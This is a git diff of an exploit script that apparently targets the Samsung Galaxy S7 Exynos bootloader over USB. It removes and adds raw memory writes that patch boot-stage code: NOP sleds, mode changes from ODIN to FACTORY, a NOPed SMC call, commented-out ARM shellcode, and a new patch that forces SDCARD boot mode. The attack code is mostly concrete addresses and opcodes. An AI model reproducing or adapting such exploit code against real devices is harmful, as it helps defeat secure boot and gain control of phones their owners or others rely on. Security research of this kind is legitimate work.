diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index ec9f52b..d90dd22 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py @@ -798,76 +798,17 @@ class ExynosDevice(): # Sends stage 5 (BL33) but returns to debugger after sending. stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read() - print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read() - off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9")) - stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):] + # print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read() + # off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9")) + # stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):] self.send_normal_stage(stage4) self.connect_device() self.usb_read(0x200) # GiAs - # # Modify something in BL33 - print(self.cd.arch_dbg.state.print_ctx()) - print(self.cd.memdump_region(0x8f063710, 0x8)) - self.cd.memwrite_region(0x8f063710, struct.pack('>I', 0x53614d74)) - print(self.cd.memdump_region(0x8f063710, 0x8)) - - # Modify USB Recovyer mode string to: NFI Patched BL33 - # patch_string = b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33' - # self.cd.memwrite_region(0x8f06ab10, patch_string) - - # Print state of x30/LR on screen - self.cd.memwrite_region(0x8f063718, struct.pack('>I', 0x61616161)) - - ### ==================== Writing nops to code cave - # Write NOP from 0x8f008cb8 to 0x8f008d14 using self.cd.memwrite - for i in range(0x8f008cb8, 0x8f008d14, 4): - self.cd.memwrite_region(i, b'\x1f\x20\x03\xd5') - #self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5)) - - # Overwrite the data pointer showing 'USB Recovery Mode' to something else - # self.cd.memwrite_region(0x8f01dc00, struct.pack('>I', 0x24080090)) - - # Overwrite a str to a something else - # self.cd.memwrite_region(0x8f01dc28, struct.pack('>I', 0xe40300f9)) - - # Nop initial show usb recovery mode screen function - # self.cd.memwrite_region(0x8f022654, struct.pack('>I', 0x1f2003d5)) - self.cd.memwrite_region(0x8f022654, struct.pack('>I', 0xe4ff9fd2)) - - # Modify a mov function (0xffff into x4). If this is not nopped, or adjusted, the device will crash. But will try to continue booting (?) - self.cd.memwrite_region(0x8f022658, struct.pack('>I', 0x1f2003d5)) #0xe5031daa. - - # Overwrite log function to display screen at end of nops - self.cd.memwrite_region(0x8f02265c, struct.pack('>I', 0xbbffff97)) #0xbbffff97 - # ================== - - # for i in range(0x8f008cd8, 0x8f008cf4, 4): - # self.cd.memwrite_region(i, struct.pack('>I', 0x1f2003d5)) - - # # Write shellcode to set some contents on x0 to x5 registers - # shellcode = f""" - # // x5 is the address at x0 - # mov x5, x0 - # mov x0, 0x1234 - # mov x1, 0x12 - # mov x2, 0xffff - # mov x3, 0xffff - # mov x4, 0xffff - # bl 0x8f025fb8 - # // ret - # """ - # shellcode = ks.asm(shellcode, as_bytes=True)[0] - # self.cd.memwrite_region(0x8f008cd8, shellcode) - - # Nop a adrp towards 0x8f09a000 - self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5)) - - # ODIN MODE to FACTORY mode - self.cd.memwrite_region(0x8f0114f8, struct.pack('>I', 0x82008052)) - - # Nop a SMC call in BL2 - self.cd.memwrite_region(0x02059650, struct.pack('>I', 0x1f2003d5)) + # Change bootmode to SDCARD (allow normal booting, if pressing volume up) + self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035)) + self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34)) # Jump into a different function that continues the boot flow (different than BL33_LR) self.cd.restore_stack_and_jump(0x02024e5c) diff --git a/source/exploit/ttbr0_el3.pkl b/source/exploit/ttbr0_el3.pkl index bb23d5b..19c5332 100644 Binary files a/source/exploit/ttbr0_el3.pkl and b/source/exploit/ttbr0_el3.pkl differ